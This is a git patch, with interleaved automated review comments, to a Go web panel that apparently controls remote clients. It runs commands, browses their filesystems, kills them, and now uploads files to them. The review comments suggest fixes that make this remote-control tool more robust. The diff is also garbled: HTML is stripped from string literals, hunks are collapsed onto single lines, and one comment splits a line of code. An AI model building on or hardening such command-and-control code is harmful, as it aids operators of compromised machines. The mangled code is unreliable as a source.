From 475deffb4c34511a494e40adcfeeedebb2bf04c0 Mon Sep 17 00:00:00 2001
From: raul
Date: Tue, 18 Jun 2024 09:46:30 +0200
Subject: [PATCH] Allow uploading files from within the filesystem explorer
---
 cmd/httpServer.go | 77 ++++++++++++++++++++++++++++++++++++-----
 cmd/templates/style.css | 5 +++
 2 files changed, 74 insertions(+), 8 deletions(-)
diff --git a/cmd/httpServer.go b/cmd/httpServer.go
index e42c9e8..a1c1dd2 100644
--- a/cmd/httpServer.go
+++ b/cmd/httpServer.go
@@ -38,6 +38,7 @@ func WebServer() {
 r.GET("/command/:clientid", getCommands)
 r.GET("/fs/:clientid", getFilesystem)
 r.POST("/ls/:clientid", listFiles)
+ r.POST("/upload/:clientid", uploadFile)
 r.POST("/command/:clientid", execCMD)
 r.POST("/kill/:clientid", sendKillswitch)
 r.GET("/dump", dumpClients)
@@ -50,6 +51,44 @@ func WebServer() {
 r.Run(":" + WebPort)
 }
+func uploadFile(c *gin.Context) {
+ id := c.Param("clientid")
+ idInt, err := strconv.Atoi(id)
+ if err != nil {
+ c.String(http.StatusInternalServerError, "Error happened, please make this a proper error later")
+ return
+ }
+
+ client, _, err := returnClient(idInt)
+ if err != nil {
+ return
+ }
+
+ if client.IsOnline == false {
+ c.String(http.StatusOK, "Client is currently offline!")
+ return
+ }
+
+ path, _ := c.GetPostForm("cmd")
+ file, err := c.FormFile("fileToUpload")
+ if err != nil {
+ log.Println(err)
+ }
+
+ resp, err := uploadFileC2(*client, *file, path)
+ if err != nil {
+ e := fmt.Sprintf("Error happened executing command: %v\n", err)
+ c.String(http.StatusOK, e)
+ return
+ }
+ if resp.Successful != true {
+ e := fmt.Sprintf("Error happened executing command: %v\n", resp.Message)
+ c.String(http.StatusOK, e)
+ return
+ }
+ listFiles(c)
+}
+
 func listFiles(c *gin.Context) {
 id := c.Param("clientid")
 idInt, err := strconv.Atoi(id)
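Review bot: In the new `uploadFile`, a failed `c.FormFile("fileToUpload")` is only logged, so the handler continues to `uploadFileC2(*client, *file, path)` and dereferences a nil `file` on any request that lacks that form part; the error branch should answer and stop, e.g. `c.String(http.StatusBadRequest, "missing fileToUpload")` followed by `return`. The `returnClient` error branch also returns without writing a response, and the ignored second result of `c.GetPostForm("cmd")` lets a missing destination path through as an empty string. Nothing visible in this hunk bounds the upload size or shows an access check on the added `/upload/:clientid` route; if middleware outside this view does not enforce both, that should be settled before the route is exposed.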
@@ -69,14 +108,22 @@ func listFiles(c *gin.Context) { } path, _ := c.GetPostForm("cmd") - - resp, err := requestFiles(*client, path) - if err != nil { - e := fmt.Sprintf("Error happened executing command: %v\n", err) - c.String(http.StatusOK, e) - return - } var list string + + uploadSection := fmt.Sprintf(`
+ + + Upload progress: +
+ `, client.ClientID, path) + list += uploadSection + currentLocation := fmt.Sprintf("Current location: %v
", path) list += currentLocation @@ -90,9 +137,23 @@ func listFiles(c *gin.Context) { client.ClientID, parentFolder) list += parentFolderLink + resp, err := requestFiles(*client, path) + if err != nil { + e := fmt.Sprintf("Error happened executing command: %v\n", err) + list += e + c.String(http.StatusOK, list) + return + } + if resp.Successful != true { + e := fmt.Sprintf("Error happened executing command: %v\n", resp.Message) + list += e + c.String(http.StatusOK, list) + return + } + for _, v := range resp.FileList.File { if v.IsFolder == true { - entry := fmt.Sprintf("[DIR] %v
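Review bot: The new `uploadSection` formats `path`, taken unmodified from the `cmd` form field, into the response fragment with `fmt.Sprintf` and no escaping, so a value containing quotes or angle brackets can alter the markup around it. Whether that becomes script or markup injection in the operator's page depends on how the front end inserts the `c.String` response, which is not visible here; escaping at the source removes the question, for example `html.EscapeString(path)` before formatting, or rendering the fragment through `html/template`. The same applies in the following hunk to `v.FullPath` and `v.Name` in the directory entries and to `resp.Message` in the error branches, all of which are reported by the remote client. `listFiles` starts and ends outside this hunk.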
", + entry := fmt.Sprintf("[d] %v/
", client.ClientID, v.FullPath, v.Name) list += entry } else { diff --git a/cmd/templates/style.css b/cmd/templates/style.css index dc78d71..a03b2dd 100644 --- a/cmd/templates/style.css +++ b/cmd/templates/style.css @@ -105,6 +105,11 @@ form { text-align: center; } +form#uploader { + text-align: left; + margin-top: 10px; +} + td a.clickable { display: block; width: 100%;
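Review bot: In the `listFiles` hunk at `-90,9`, both added failure branches append the error text to `list` and reply with `http.StatusOK`, so a caller cannot tell a failed listing from a successful one by status; `uploadFile` ends by calling `listFiles(c)` and inherits this. If the front end tolerates it, a non-2xx status such as `http.StatusBadGateway` in those two branches would make failures detectable and loggable. The new comparison `if resp.Successful != true {` reads more idiomatically as `if !resp.Successful {`. The function body continues outside the hunk.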